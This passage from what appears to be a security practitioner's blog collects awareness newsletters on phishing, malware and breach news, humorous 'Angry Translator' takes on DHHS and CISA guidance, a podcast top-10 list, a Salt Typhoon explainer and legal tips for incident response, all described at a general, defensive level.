Credential Theft: Once installed, the malware enables a broad set of malicious actions, including credential theft of banking, cryptocurrency, and other critical applications.

Further Reading: KnowBe4 Blog

Phishing Scam Mimics Employment Termination Notices

Cybercriminals are deploying phishing attacks that impersonate employment termination notices to exploit individuals' fear of job loss. These deceptive emails appear to be official communications from human resources departments, complete with authentic-looking logos and case numbers, urging immediate action to avoid "serious legal consequences."

Key Insights:

Deceptive Emails: The phishing emails are designed to closely resemble legitimate employment termination notices, making it challenging for recipients to distinguish between authentic and fraudulent communications.

Malware Distribution: Clicking on the provided link directs victims to a fake Microsoft webpage that prompts the download of malicious software. This malware can steal sensitive information, including banking credentials, leading to significant financial and personal repercussions.

Exploiting Emotional Triggers: By preying on the fear of job loss, attackers increase the likelihood of recipients reacting hastily and clicking on malicious links without proper scrutiny.

Further Reading: KnowBe4 Blog

Malicious Google Ads Exploit Printer Troubleshooting Searches

Cybercriminals are exploiting Google Ads to target users seeking solutions for printer issues, particularly those involving HP and Canon devices.

Key Insights:

Deceptive Advertisements: Scammers purchase Google Ads that appear as legitimate tech support for printer drivers, luring users into clicking on malicious links.

Fake Installation Processes: Upon visiting these fraudulent sites, users encounter a simulated driver installation that culminates in a fabricated error message, warning that further attempts may damage the printer and void its warranty.

Phony Tech Support: The error message prompts users to initiate a live chat, connecting them with scammers posing as tech support representatives, who may then attempt to extract personal information or payments.

Further Reading: KnowBe4 Blog

Phishing Attack Exploits Google Calendar to Bypass Spam Filters

Cybercriminals are leveraging Google Calendar invites to conduct phishing attacks that evade spam filters. By sending fraudulent meeting invitations, they prompt recipients to click on malicious links embedded within the event details.

Key Insights:

Exploitation of Trusted Services: Attackers utilize legitimate Google services, such as Calendar and Forms, to enhance the credibility of their phishing attempts, making detection more challenging.

Evasion of Security Measures: By originating from trusted platforms, these phishing messages can bypass traditional email security filters, increasing the likelihood of reaching potential victims.

Deceptive Tactics: The fraudulent invitations often include links disguised as legitimate actions, such as viewing event details or confirming attendance, which redirect to malicious sites designed to harvest user credentials.

Further Reading: BleepingComputer

Smart Devices in Homes Pose Privacy and Security Risks

Recent analyses have highlighted the potential privacy and security vulnerabilities associated with the increasing presence of smart devices in households. These devices, while offering convenience, can be exploited by malicious actors to compromise personal information and security.

Checkpoint Blog

Key Insights:

Unauthorized Access: Smart devices, such as cameras and voice assistants, can be manipulated to monitor activities within homes without the owner's consent.

Data Exploitation: Information collected by these devices may be accessed or intercepted by unauthorized parties, leading to potential misuse of personal data.

Regulatory Challenges: The rapid adoption of smart technology has outpaced the development of comprehensive regulations, leaving consumers vulnerable to emerging threats.

Further Reading: Check Point Blog

Cybercriminals Exploit Fake CAPTCHAs to Distribute Malware

Recent analyses have identified a deceptive tactic where cybercriminals use fake CAPTCHA pages to distribute malware, exploiting users' trust in these verification systems.

Key Developments:

Malicious Redirects: Users visiting compromised websites are redirected to fraudulent CAPTCHA pages that closely mimic legitimate services like Google and CloudFlare.

Clipboard Hijacking: These fake CAPTCHAs silently copy malicious commands to the user's clipboard via JavaScript, prompting them to execute these commands unknowingly through the Windows Run prompt.

Malware Installation: Executing the copied commands leads to the installation of malware, including information stealers and remote-access trojans (RATs), which can extract sensitive data and provide persistent access to compromised systems.

Further Reading: ReliaQuest Blog

Data Breach at American Addiction Centers Affects Over 422,000 Individuals

American Addiction Centers (AAC), a leading provider of substance abuse treatment services, has reported a data breach impacting more than 422,000 individuals.

Key Details:

Incident Timeline: The breach was detected on September 26, 2024, with unauthorized access occurring several days prior.

Compromised Information: Exfiltrated data includes names, addresses, phone numbers, dates of birth, Social Security numbers, health insurance details, and medical record identifiers. Notably, treatment information and payment card data were not affected.

Threat Actor Involvement: The Rhysida ransomware group has claimed responsibility, alleging the theft of approximately 2.8 terabytes of data.

Notification and Support: AAC has begun notifying affected individuals and is offering 12 months of free credit monitoring services.

Further Reading: SecurityWeek

Sophisticated Phishing Scams Lead to Significant Cryptocurrency Losses

Recent incidents have highlighted advanced phishing attacks where cybercriminals impersonate legitimate services to gain unauthorized access to individuals' cryptocurrency wallets, resulting in substantial financial losses.

Key Insights:

Impersonation of Trusted Entities: Attackers pose as representatives from reputable organizations, such as Google or cryptocurrency platforms, to deceive victims into believing their accounts are compromised.

Manipulation of Security Features: Victims receive seemingly legitimate security alerts and prompts, which are actually orchestrated by the attackers to facilitate unauthorized account access.

Exploitation of Stored Sensitive Information: Once access is obtained, cybercriminals search for stored sensitive data, such as cryptocurrency wallet seed phrases, enabling them to transfer funds without detection.

Further Reading: Krebs on Security

Mobile Phishing Attacks Employ New Tactics to Evade Security Measures

Key Insights:

Exploitation of PWAs and WebAPKs: Unlike traditional apps, these malicious PWAs and WebAPKs are essentially phishing websites packaged to look like legitimate applications. This means they do not exhibit the typical behaviors or characteristics associated with malware, making detection more challenging.

Bypassing Security Measures: Their ability to bypass traditional security warnings of a mobile operating system, and total sidestepping of app store vetting processes, is particularly concerning. This allows attackers to distribute malicious content without triggering standard security alerts.

Anticipated Increase in Sophistication: It is anticipated that more sophisticated and varied phishing campaigns utilizing PWAs and WebAPKs will emerge, unless mobile platforms change their approach towards them.

Further Reading: KnowBe4 Blog

'James Bond-Style' Scams Lead to Significant Financial Losses

Recent reports have highlighted a surge in sophisticated scams where fraudsters impersonate trusted entities, such as law enforcement or intelligence agencies, to deceive victims into believing they are involved in international criminal activities.

Key Insights:

Deceptive Communication: Scammers contact individuals, claiming to be from reputable organizations like Amazon, the U.S. Post Office, or law enforcement agencies, alleging the victim's involvement in global criminal schemes.

Manipulative Tactics: Victims are coerced into withdrawing large sums of money from personal accounts under the guise of protecting their funds from criminal misuse. They are instructed to hand over cash to individuals posing as law enforcement agents, who then abscond with the money.

Significant Financial Impact: These scams have led to substantial financial losses for victims, with little to no chance of recovery once the funds are handed over.

Further Reading: KnowBe4 Blog

DHHS Angry Translator: Breaking Down the Latest HIPAA Security Rule Proposal

January 7, 2025

Let’s face it: regulatory updates like those from the Department of Health and Human Services (DHHS) often come wrapped in a blanket of formal language that makes you wonder, What are they really saying? Enter the DHHS Angry Translator, here to break it down and tell it like it is. Like the recently introduced CISA Angry Translator, the DHHS Angry Translator, Hank, has a no-nonsense take on the proposed changes to the HIPAA Security Rule—because sometimes, you need a little fire to get the message across.

Created with help from ChatGPT

DHHS Says:
"Covered entities and business associates must adopt reasonable and appropriate administrative, physical, and technical safeguards to protect the confidentiality, integrity, and availability of ePHI."

Hank:
"Look, people! You’re handling sensitive health information here—stop treating it like a casual to-do list. Lock it down! If you wouldn’t leave patient records lying around in a coffee shop, don’t let your servers be a free-for-all!"

DHHS Says:
"We propose clarifying the definition of 'security incident' to ensure timely identification and response to unauthorized access, use, or disclosure of ePHI."

Hank:
"Translation: Stop pretending you didn’t notice the breach. When someone jiggles the doorknob, that’s your cue to ACT, not wait for the whole door to come down!"

DHHS Says:
"Entities must perform regular risk assessments to identify vulnerabilities and implement measures to mitigate those risks effectively."

Hank:
"Let me break it down for you: Take a good, hard look at your systems. If you see a crack, fix it! Don’t wait for a cybercriminal to make it a canyon!"

DHHS Says:
"The proposed changes aim to enhance accountability and transparency in managing ePHI security."

Hank:
"Translation: If you mess up, we’re coming for you. There’s no hiding anymore. Either you get your house in order, or we’ll do it for you—with penalties."

DHHS Says:
"We propose revisions to the administrative safeguards, emphasizing the necessity of documented policies and procedures for incident response and risk management."

Hank:
"Y’all need to WRITE THIS DOWN! A half-baked plan in someone’s head doesn’t cut it. If a breach happens and your response is ‘Uh... what now?’—you’re already toast!"

DHHS Says:
"The proposal includes requirements to integrate continuous monitoring into risk management practices for ePHI security."

Hank:
"‘Continuous monitoring’ means don’t just check your security once a year like it’s a New Year’s resolution. Stay on top of it! Hackers aren’t taking vacations—they’re coming for you every day!"

DHHS Says:
"Entities must evaluate their use of encryption to ensure ePHI remains secure during transmission and storage."

Hank:
"If your data isn’t encrypted, it’s like sending patient records via postcard: everyone can see it! Encrypt. Everything. Period."

DHHS Says:
"We are revising technical safeguard requirements to account for emerging technologies and new cybersecurity threats."

Hank:
"Translation: If you’re still using security from the early 2000s, it’s time for an upgrade. Hackers have moved on, and so should you!"

DHHS Says:
"Workforce training should address phishing attacks, unauthorized device use, and secure access to ePHI."

Hank:
"Teach your people that clicking shady links isn’t just a bad idea—it’s a disaster waiting to happen. Also, tell them to stop using their cousin’s unsecured iPad for work!"

DHHS Says:
"The proposed changes highlight accountability mechanisms for business associates handling ePHI."

Angry Translator:
"Listen up, third parties: If you’re touching ePHI, you’re on the hook too. No more pointing fingers when things go wrong. Handle the data like it’s your grandma’s—or get burned!"

DHHS Says:
"Periodic evaluations of safeguards will ensure compliance with evolving security standards."

Angry Translator:
"‘Periodic evaluations’ means you don’t just set it and forget it. Check your defenses regularly, or you’ll be picking up the pieces after the next attack!"

Final Note from the Angry Translator:
"This proposal isn’t just about checking boxes—it’s about protecting people. If your security plan is older than your favorite streaming service, fix it. Now. Because when things go wrong, it’s not just your reputation on the line—it’s patients’ trust and safety too."

The commenting period for the HIPAA Security Rule Draft is open until March 7, 2025. If you’re at a healthcare organization make sure to consume it and submit your public comments. I am currently doing a deep dive on the proposal and will have thoughts in a future blog post.

Top 10 Exploring Information Security Podcasts

December 31, 2024

As we wrap up an incredible year, we're thrilled to reflect on the top podcasts of 2024 that captured the attention of listeners across the cybersecurity community. These episodes brought forward thought-provoking discussions, practical insights, and exciting guests, making this a standout year for Exploring Information Security. Below are the top 10 episodes that ChatGPT thought were the best of 2024. As I analyzed the analytics I couldn’t decide which stats to focus in on. Here’s what the podcasts look like based on plays from Apple Podcast Analytics.

Screenshot of the analytics from Apple Podcasts analytics

I thought about going by average consumption but I noticed that we have lower percentage than in the past. That’s due to the longer episodes I’m putting out. When I’m putting out 20-30 min episodes I get closer to a 70-80% consumption rate. Do unique listeners and engagement say more? At this point I decided to just let ChatGPT do the analysis of all the analytics and provide me with the Top 10 list. It also, wrote the first draft of this blog post. I’m okay with the Top 10 list. I believe it represents the podcast well and some of the interest I’ve seen in other places regarding individual episodes.

The numbers are just from Apple Podcast. There are listeners on other platforms such as Spotify, Amazon, and other podcast platforms that grab the feed. I also expanded into YouTube in the middle of the year and hope to get that tuned better. I may try to consolidate the stats all into one platform at some point but I’m not there yet. Apple Podcast is the most popular platform so I think it provides the best sample size.

Without further ado let’s get into the Top 10 list for 2024.

2024 Top 10 Exploring Information Security Podcast

1. Exploring Information Security 2024 Relaunch

Release Date: January 2, 2024
Guest: Solo Episode

Key Highlights:
Our relaunch episode kicked off the year by outlining an exciting new direction for Exploring Information Security. I’m shocked that this came out on top but there seemed to be some excitement at the return of the podcast. Which I’m very appreciative of and makes me want to kick myself for not bringing the podcast back sooner.
Listen Here: Exploring Information Security 2024 Relaunch

2. What Cybersecurity Tools Every Organization Should Have

Release Date: February 27, 2024
Guest: Rob Fuller

Key Highlights:
Rub Fuller shared insights into the essential tools that every organization should have to secure their digital infrastructure. The episode covered endpoint protection, threat intelligence platforms, and emerging technologies that simplify security operations. This was the result of a discussion we had during another podcast recording. I thought it was a great discussion to turn into it’s own topic.
Listen Here: What Cybersecurity Tools Every Organization Should Have

3. How to Hack a Satellite

Release Date: January 23, 2024
Guest: Tim Fowler

Key Highlights:
Tim Fowler took listeners on a deep dive into the vulnerabilities and challenges of securing space technology. From real-world case studies of satellite hacks to strategies for defense, this episode offered a unique and fascinating perspective on the intersection of cybersecurity and aerospace. This will continue to grow as a new field for cybersecurity very similar to how cloud security, identity access management, and AI have become their own fields. And as usual we’re already behind on securtiy…
Listen Here: How to Hack a Satellite

4. What Are the Hiring Trends in Cybersecurity for 2024?

Release Date: January 16, 2024
Guest: Erin Barry

Key Highlights:
In this insightful episode, Erin Barry analyzed the latest hiring trends in cybersecurity heading into 2024. The conversation touched on the growing demand for professionals with cloud and AI expertise, the importance of soft skills, and tips for breaking into the field. A must-listen for job seekers and industry leaders. This is a podcast I’d like to make a staple for the new year because it did seem to be a popular topic.
Listen Here: What Are the Hiring Trends in Cybersecurity for 2024?

5. How to Navigate a Career in Cybersecurity

Release Date: August 13, 2024
Guest: Ralph Collum

Key Highlights:
Ralph Collum shared his journey from entry-level roles to executive leadership in cybersecurity. The discussion covered mentorship, certifications, and strategies for navigating career plateaus. I always enjoy talking to Ralph. He’s very passionate about developing careers in Cybersecurity. It makes sense that this one would follow the hiring trends for 2024. I expect that with the current hiring market job seeking and career podcast episodes will remain popular.
Listen Here: How to Navigate a Career in Cybersecurity

6. How AI Is Impacting Cybersecurity

Release Date: July 30, 2024
Guest: Steve Orrin

Key Highlights:
Steve Orrin explored the dual role of artificial intelligence in cybersecurity, highlighting its use in threat detection and the ethical concerns it raises. The episode featured real-world examples of AI-driven security solutions and debated the future of automation in the industry. I really enjoyed this conversation with Steve because he’s not only an executive but someone who also attends DEFCON on a regular basis. He traverses both worlds well and has a very intelligence take on key topics in Cybersecurity.
Listen Here: How AI Is Impacting Cybersecurity

7. How Responding to Phishing Has Changed in the Last 5 Years

Release Date: January 30, 2024
Guest: Kyle Andrus

Key Highlights:
Kyle Andrus and I discussed how phishing has changed since I last had him on the podcast. I always enjoy have Kyle on because we always have a good conversation. In fact he and I have had a couple recording sessions at this point on other topics because we always end up talking about something else. I’ve got another recording sessions scheduled with him for early 2025 to talk about ransomware gangs.
Listen Here: How Responding to Phishing Has Changed in the Last 5 Years

8. How to Automate Information Security with Python

Release Date: July 23, 2024
Guest: Mark Baggett

Key Highlights:
Mark Baggett broke down the ways Python is revolutionizing cybersecurity automation. From simplifying vulnerability scanning to streamlining log analysis, this episode was packed with actionable insights for security professionals looking to enhance their workflows. Mark is the Python guru for Cybersecurity. He’s written an entire SANS class on it and he’s been talking about Python ever since I’ve been in the industry.
Listen Here: How to Automate Information Security with Python

9. What Is Mimikatz?

Release Date: February 6, 2024
Guest: Rob Fuller

Key Highlights:
Rob Fuller delivered an in-depth look at Mimikatz, a powerful tool often used in penetration testing and malicious attacks. He explained its functionality, provided examples of its use, and discussed the countermeasures security teams can implement to defend against it. I’ve dubbed Rob the Hacker Historian because of his wealth of knowledge in hacking. He made the Top 10 list three times this year and was also in the RERELEASE of the episode on the MS08-067 vulnerability.
Listen Here: What Is Mimikatz?

10. How Worrying Is SIM Swapping in 2024?

Release Date: August 6, 2024
Guest: Rob Fuller

Key Highlights:
Rob Fuller returned to discuss the NOT SO alarming rise of SIM swapping attacks in 2024. This was based on a LinkedIn post he made on SIM Swapping that got quite a bit of commentary. I thought it was a great discussion and would make for an interesting episode. Surprise! It was a great conversation and people seemed to engage with the podcast episode. These are the kind of episodes I want to have that challenge some of the norms within Cybersecurity.
Listen Here: How Worrying Is SIM Swapping in 2024?

Honorable Mentions

Two of the people I always wanted to have on the podcast but I was to scared to ask prior to shutting down the podcast was Troy Hunt and Patrick Gray. Both people have helped me navigate and shape my career in cybersecurity and I was happy that both agreed to come on. Both were absolutely amazing people to have a conversation with.

What is Have I Been Pwned?

The Origins of Risky Business with Patrick Gray

Finally, Dave Chronister has been a huge supporter of the show and a wonderful friend. He also runs a phenomenal conference called ShowMeCon (early-bird tickets available now!)! He’s always a joy to have on the show but this past year he sponsored several episodes and I had a lot of great conversations with presenters from the conference. I have probably never laughed more than I did talking to Kevin Johnson about whatever was on his mind. Also, I really enjoyed the panel we did at ShowMeCon. Unfortunately, I forgot to hit the record button and thus entered the mythical status as a podcast that only those present got to enjoy.

ShowMeCon: Kevin Johnson and whatever he wants to talk about

Final Thoughts

As always, I’m grateful to the listeners of the show. I don’t hear from a lot of them but based on the numbers and engagement they’re out there. I’m also super grateful to all the guests that have come on the show to share their insights and knowledge. I am looking forward to another great year of conversations with amazing guests!

What were your favorite episodes in 2024?

Introducing the CISA Angry Translator Series

December 23, 2024

Today, we’re launching something new: the CISA Angry Translator Series. This idea came from a blog post by Brian Dye over at Corelight. CISA has been releasing more and more advisories and directives. There are certain themes from these releases that just aren’t hitting home. Enter the Angry Translator whom I’ve dubbed Frank. He’s here to say what CISA really wants to say but can’t.

This idea is a parody off the very funny Key and Peel skit where Obama get’s an Angry Translator called Luther. It was so popular that Keegan-Michael Key got up with President Obama for the 2015 White House Correspondents’ Dinner.

Below is what you can expect from the series. I’ve used ChatGPT to create the initial draft and made edits where necessary. Make sure to check out Brian’s post and Corelight. I’ve got an upcoming podcast with Brian talking about Corelight and I really like what they’re doing.

CISA's Angry Translator: Cloud Security Directive

CISA Directive: https://www.cisa.gov/news-events/directives/bod-25-01-implementing-secure-practices-cloud-services

CISA Says:
"Federal agencies must implement secure practices for cloud services to safeguard federal information and information systems."

Frank:
"Hey, government folks! Your cloud setups are a hacker's playground right now. Lock them down before you hand over our data on a silver platter!"

CISA Says:
"Recent cybersecurity incidents highlight the significant risks posed by misconfigurations and weak security controls."

Frank:
"Translation: Your sloppy setups are like leaving your front door wide open with a 'Welcome Hackers' sign. Fix it before we all pay the price!"

CISA Says:
"Agencies are required to identify specific cloud tenants, implement assessment tools, and align cloud environments to CISA’s Secure Cloud Business Applications (SCuBA) secure configuration baselines."

Frank:
"Step 1: Know what cloud stuff you have. Step 2: Use the tools we've given you to check them. Step 3: Follow the dang security guidelines! It's not rocket science, people!"

CISA Says:
"Implement all mandatory SCuBA policies effective as of this Directive’s issuance no later than June 20, 2025."

Frank:
"You've got until June 20, 2025, to get your act together. That's more than enough time to stop being a cybersecurity dumpster fire!"

CISA Says:
"Maintaining secure configuration baselines is critical in the dynamic cybersecurity landscape."

Frank:
"The cyber threats are evolving, and your security should too. Keep up, or get left behind—and hacked!"

CISA Says:
"This Directive will further reduce the attack surface of the federal government networks."

Frank:
"We're trying to make it harder for the bad guys to mess with us. Help us help you, help us help you, help us help you!"

Final Note from Frank:
"Look, securing your cloud services isn't optional—it's your job. Stop dragging your feet, follow the directive, and let's not end up on the front page for a massive data breach. Get it together, now!"

Breakdown of Events: Salt Typhoon Hacking Group Targets U.S. Telecommunications

December 17, 2024

Introduction: The Growing Threat of Salt Typhoon

The Chinese cyber espionage group known as Salt Typhoon has successfully breached several major U.S. telecommunications companies. This breach has raised alarms across government agencies, resulting in calls for the sector to bolster its cybersecurity measures. It’s also become big enough news that I have my family talking to me about it. As I prepare for a holiday get together with the family I decided to put together this breakdown of the events surrounding this discovery and the subsequent response from U.S. authorities and the federal government. Hopefully, this will help others get up to speed and join the family conversation around Salt Typhoon.

The Salt Typhoon Cyberattack: What We Know So Far

Salt Typhoon has infiltrated at least eight prominent U.S. telecom companies, including AT&T, Verizon, and T-Mobile. The group has targeted not just corporate entities but also high-profile government and political figures, potentially compromising metadata and, in some cases, the content of sensitive communications. The scope of this breach is vast, and experts are concerned about the broader implications for national security.

What Did Salt Typhoon Specifically Access?

The hackers accessed critical infrastructure within these companies, focusing on:

Metadata: They collected data on who was communicating with whom, when, and where.
Communication Content: In some cases, they accessed the actual content of communications, including emails and messages.
Internal Systems: Salt Typhoon exploited vulnerabilities to infiltrate internal company networks, potentially compromising systems used to manage communication between telecommunications providers and government agencies.

The scope of this breach is vast, and experts are concerned about the broader implications for national security.

Source: Salt Typhoon Hackers Infiltrate U.S. Telecoms - AP News

What are the ramifications of the access?

National Security Threats

Since telecommunications systems are integral to the functioning of government communications and defense operations, unauthorized access by a foreign state-sponsored group could compromise national security. The breach could lead to:

Espionage: Sensitive government communications, including classified information, could be intercepted, analyzed, and used for strategic advantage by foreign actors.
- Informant Identification: The threat actors could identify who the US government has identified as a Chinese or other nation state spy. This information is invaluable as it allows incorrect information or complete removal of the spy from the U.S.
Undermining Military Operations: If Salt Typhoon gained access to military communication channels, it could disrupt or manipulate defense strategies, communications, and troop movements, potentially weakening national defense readiness.
Supply Chain Vulnerabilities: The telecom infrastructure is tied to critical sectors like defense, finance, and healthcare. By compromising telecom networks, the attackers could infiltrate other critical industries, creating cascading vulnerabilities.

Corporate Espionage

Telecommunications companies manage massive amounts of sensitive corporate data, including contracts, communication, and internal systems used by businesses across industries. Salt Typhoon's access to telecom infrastructure could enable:

Exfiltration of Trade Secrets: By obtaining private communications and proprietary data, the hackers could gain valuable insight into corporate strategies, product development, and future business decisions.
Targeting High-Profile Executives and Clients: The hacking group could gather intelligence on key executives and high-profile clients, leading to targeted phishing campaigns, blackmail, or leveraging this information for financial gain or competitive advantage.

Personal Privacy Concerns

Telecommunications companies manage vast amounts of personal data, including call records, text messages, location data, and internet usage patterns. The implications for personal privacy are significant:

Identity Theft: With access to sensitive personal information, Salt Typhoon could facilitate identity theft by harvesting personally identifiable information (PII) or leveraging it for future cybercrimes.
Surveillance: The hackers could track individuals of interest, monitoring their communications or movements, potentially leading to political repression, blackmail, or surveillance of dissidents.
Erosion of Trust: If customers' private data were exposed, it could result in a loss of trust in telecom providers, eroding the public's confidence in their ability to protect sensitive personal information.

Disruption to Communication Networks

Given that telecommunications are critical to day-to-day operations in both the private and public sectors, the breach could lead to:

Service Interruptions: Salt Typhoon could potentially manipulate telecom networks to disrupt services or cause widespread outages, impacting businesses, emergency services, and government operations.
Manipulation of Communications: The group could inject false information into the communication system, manipulate messages, or redirect communications to unauthorized entities, undermining the integrity of telecom networks.

Escalation of Cybersecurity Threats

This breach highlights vulnerabilities within the telecommunications infrastructure, which could inspire further cyberattacks. Other threat actors might exploit similar weaknesses, leading to:

Copycat Attacks: Other state-sponsored groups or cybercriminals may attempt to replicate or build upon Salt Typhoon's methods, targeting the same or other telecom providers with different attack vectors.
Increased Cybercrime: Hackers might use access to telecom networks to launch further cyberattacks, such as distributed denial-of-service (DDoS) attacks, ransomware campaigns, or data exfiltration operations.

Diplomatic and Geopolitical Fallout

If it is conclusively proven that Salt Typhoon is backed by the Chinese government, this breach could have far-reaching diplomatic consequences:

Strained Relations: The U.S. government could take retaliatory actions, including sanctions or other diplomatic measures, further exacerbating tensions between the U.S. and China.
International Repercussions: Other countries, particularly U.S. allies, may also reconsider their engagement with Chinese telecom equipment providers, leading to a shift in global trade and technology alliances.

Government Response: A Wake-up Call for Telecoms

In response to this alarming breach, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have issued joint guidance urging telecom companies to enhance their security measures. Their recommendations include adopting stronger data encryption, centralizing security systems, and establishing continuous threat monitoring to prevent future attacks.

Source: FBI and DHS Issue Cybersecurity Alert on Telecom Sector - CISA

The FCC’s Role: Proposing New Rules to Strengthen Telecom Security

To address the growing cybersecurity risks, the Federal Communications Commission (FCC) has proposed new rules requiring telecom companies to submit annual certifications attesting to their compliance with updated security protocols. The FCC’s proposals aim to ensure telecom firms take proactive steps to defend against cyber threats. Penalties for non-compliance could follow, emphasizing the importance of safeguarding communication channels.

Sources: FCC Proposes New Cybersecurity Rules for Telecoms - DarkReading; FCC to Demand Telcos Improve Security - Seriously Risky Business

Federal Government Calls for Immediate Action

U.S. Senators have expressed grave concern over the scale of the Salt Typhoon attack. Senator Ben Ray Lujan described the breach as "possibly the largest telecommunications hack in American history," calling for swift government action to improve security within the telecom sector.

Source: Senators Warn the Pentagon: Get a Handle on China's Telecom Hacking - Wired

Encrypted Communication Platforms: A Safer Alternative for Users

As an additional safeguard, individuals are encouraged to use encrypted messaging platforms such as WhatsApp or Signal. These platforms offer a higher level of security compared to traditional SMS, providing a more secure means of communication in the wake of these breaches.

Source: FBI Warns iPhone and Android Users: Stop Sending Texts - Forbes

The Response from China: Denial of Involvement

Despite mounting evidence of Salt Typhoon’s activities, the Chinese government has denied any involvement in the cyberattacks. They label the allegations as disinformation, rejecting any claims of their participation in the hacking group’s operations.

Source: White House says at least 8 US telecom firms, dozens of nations impacted by China hacking campaign - AP News

Conclusion: The Urgency for Change

The Salt Typhoon cyberattack has exposed critical vulnerabilities in U.S. telecommunications infrastructure. With federal agencies and lawmakers calling for immediate action, it is essential that telecom providers take comprehensive measures to protect sensitive communications and prevent future breaches. As the government and telecom companies work toward stronger security practices, it’s clear that the stakes have never been higher.

What Individuals Can Do

While the breach highlights systemic issues within telecom security, individuals can also take steps to protect their personal information and mitigate the impact of such cyberattacks. Using encrypted communication platforms like Signal or WhatsApp for sensitive conversations can provide an added layer of protection against potential surveillance or interception. Additionally, individuals should move away from SMS or text based authentication into accounts. This isn’t always possible but more and more services are offering app based authentication such as Google Authenticator, DUO, or a similar mobile application. By taking these precautions, individuals can reduce their personal exposure to cyber threats and enhance their overall online security.

Sources:

Created with help from ChatGPT

Avoiding Legal Landmines in Incident Response: A Practical Guide for Security Teams

December 10, 2024

The information provided in this blog post does not, and is not intended to, constitute legal advice; rather, the ensuing conversation is for general informational purposes only.

In today’s cybersecurity landscape, responding swiftly and effectively to security incidents is critical. However, navigating the legal implications during an incident is equally vital to protect an organization from further liabilities. This guide covers essential strategies for avoiding the most common legal pitfalls in incident response (IR), based on insights from my recent podcast episode with cybersecurity attorney Thomas Ritter Exploring Legal Landmines in Incident Response.

Use Careful Terminology: “Incident” vs. “Breach”

When a security event occurs, the language you use to describe it can have significant legal implications. Terms like “breach” have specific legal definitions that can trigger mandatory notification requirements or other regulatory obligations. As a best practice, use neutral terms like “incident” until the situation is fully assessed by legal counsel.

Tip: Train your teams on preferred terminology and involve legal early in the process to make sure everyone understands when and how to escalate terms like “breach.”

Establish Attorney-Client Privilege Early

Engaging external counsel immediately after a security incident helps protect sensitive communications and investigative findings under attorney-client privilege. This protection is crucial should your organization face litigation, as it limits the exposure of certain communications during the discovery process.

Tip: Collaborate with your legal team to establish protocols for involving external counsel, even for minor incidents, to ensure privilege is in place if needed.

Refine Your Communication Strategy

Transparency is key during incident response, but be cautious with internal and external communications, especially in the early stages. Avoid speculative statements and keep communications brief until forensic findings provide a clearer picture.

Tip: Work with your legal and PR teams to develop standardized communications templates for different scenarios, ensuring clarity and consistency without compromising on accuracy.

Define Roles and Responsibilities in Your IR Plan

Many incident response plans (IRPs) lack a clear delineation of responsibilities, particularly regarding who determines when an incident becomes a breach. Ideally, legal counsel—preferably external—should make this determination to preserve objectivity and privilege.

Tip: Review your IRP to ensure that roles and escalation points are well defined, with legal counsel involved at key decision points.

Handle Ransomware Negotiations Carefully

Ransomware incidents often involve complex decisions about whether to engage with or pay threat actors. Professional negotiators can play a valuable role here, as they are well-versed in handling threat actor communications and negotiating terms without compromising your organization’s legal standing.

Tip: Always hire professionals for ransomware negotiations. Amateur negotiators risk mishandling sensitive communications, which can exacerbate both financial and reputational damage.

Prepare for Possible Class Action Litigation

In the event of a data breach, it’s increasingly common for affected parties to file class action lawsuits. Many legal teams recommend proactive measures to limit liability, such as documented protocols that show your team acted swiftly and responsibly during the incident.

Tip: Ensure your IR documentation is thorough and compliant with industry standards, as this can provide valuable evidence should litigation arise.

Use Tabletop Exercises to Strengthen Incident Preparedness

Incident response tabletop exercises, especially those involving executive teams, help prepare your organization to navigate both operational and legal complexities in a crisis. In addition to familiarizing staff with the IRP, tabletop exercises offer an opportunity to practice coordination with legal counsel, PR, and executive stakeholders.

Tip: Schedule annual or biannual tabletop exercises that simulate high-stakes incidents, like ransomware attacks, to ensure all teams are familiar with legal protocols.

Conclusion: A Proactive Legal Strategy in Incident Response

Responding to a security incident without considering legal implications can expose your organization to additional risks. By carefully navigating language, establishing attorney-client privilege, and preparing staff with tabletop exercises, your organization can avoid many of the legal pitfalls associated with incident response. Whether preparing for regulatory inquiries or class action lawsuits, these best practices can help your organization respond to incidents effectively and with minimized legal exposure.

December 2024 - Healthcare Executive Leadership Cybersecurity Newsletter

December 9, 2024

These are the stories I shared internally with my leadership. Feel free to take and use for your own leadership. Created with help from ChatGPT.

New Professional Liability Insurance for CISOs

In response to the increasing legal scrutiny faced by Chief Information Security Officers (CISOs), Crum & Forster has introduced a professional liability insurance policy tailored specifically for these executives. Traditionally, directors and officers (D&O) liability policies have not encompassed CISOs, leaving them vulnerable to personal financial risks in the event of cybersecurity incidents.

Key Features of the Policy:

Comprehensive Coverage: Protects against claims of negligence or inadequate work arising from cybersecurity services.

Flexible Acquisition: Available for purchase by organizations on behalf of their CISOs or directly by the CISOs themselves.

Extended Protection: Covers consulting activities for the organization and its subsidiaries, as well as external engagements, including pro bono IT security work.

Further Reading: CyberScoop Article

Bipartisan Effort to Enhance Healthcare Cybersecurity

On November 22, 2024, Senators Bill Cassidy (R-LA), Mark Warner (D-VA), John Cornyn (R-TX), and Maggie Hassan (D-NH) introduced the Health Care Cybersecurity and Resiliency Act of 2024. This bipartisan legislation aims to bolster cybersecurity measures within the healthcare sector, addressing the increasing threats to patient data and healthcare operations.

Help Center

Key Provisions:

Grant Funding: Allocates resources to healthcare entities for enhancing cyberattack prevention and response capabilities.

Training Initiatives: Provides cybersecurity best practices training to healthcare institutions.

Support for Rural Providers: Offers tailored guidance to rural health clinics on breach prevention and resilience strategies.

Interagency Coordination: Improves collaboration between the Department of Health and Human Services (HHS) and the Cybersecurity and Infrastructure Security Agency (CISA) for effective cyberattack responses.

Regulatory Modernization: Updates Health Insurance Portability and Accountability Act (HIPAA) regulations to incorporate current cybersecurity best practices.

Incident Response Planning: Mandates the development and implementation of a cybersecurity incident response plan by the HHS Secretary.

Implications for Healthcare Organizations: This legislation underscores the critical need for robust cybersecurity frameworks within healthcare institutions. Executive leaders should proactively assess their organization's cybersecurity posture, ensuring alignment with emerging standards and readiness to leverage potential federal support. Embracing these initiatives will not only protect sensitive patient information but also enhance operational resilience against cyber threats.

Further Reading: Senate HELP Committee Press Release

December 2024 - Security Awareness Newsletter

December 6, 2024

This is a security awareness focused newsletter that I share internally. Feel free to grab and use for your own internal security awareness program.

Copyright Infringement Phishing Scams Targeting Facebook Business Users

Cybercriminals are targeting Facebook business and advertising account users, especially in regions like Taiwan, with phishing emails that falsely claim copyright infringement. These emails urge recipients to download a file (disguised as a PDF), which actually installs information-stealing malware on the victim’s device. This tactic aims to harvest sensitive information from users who trust the email’s legal-sounding message.

Key Points:

Target Audience: Facebook business and advertising account users.

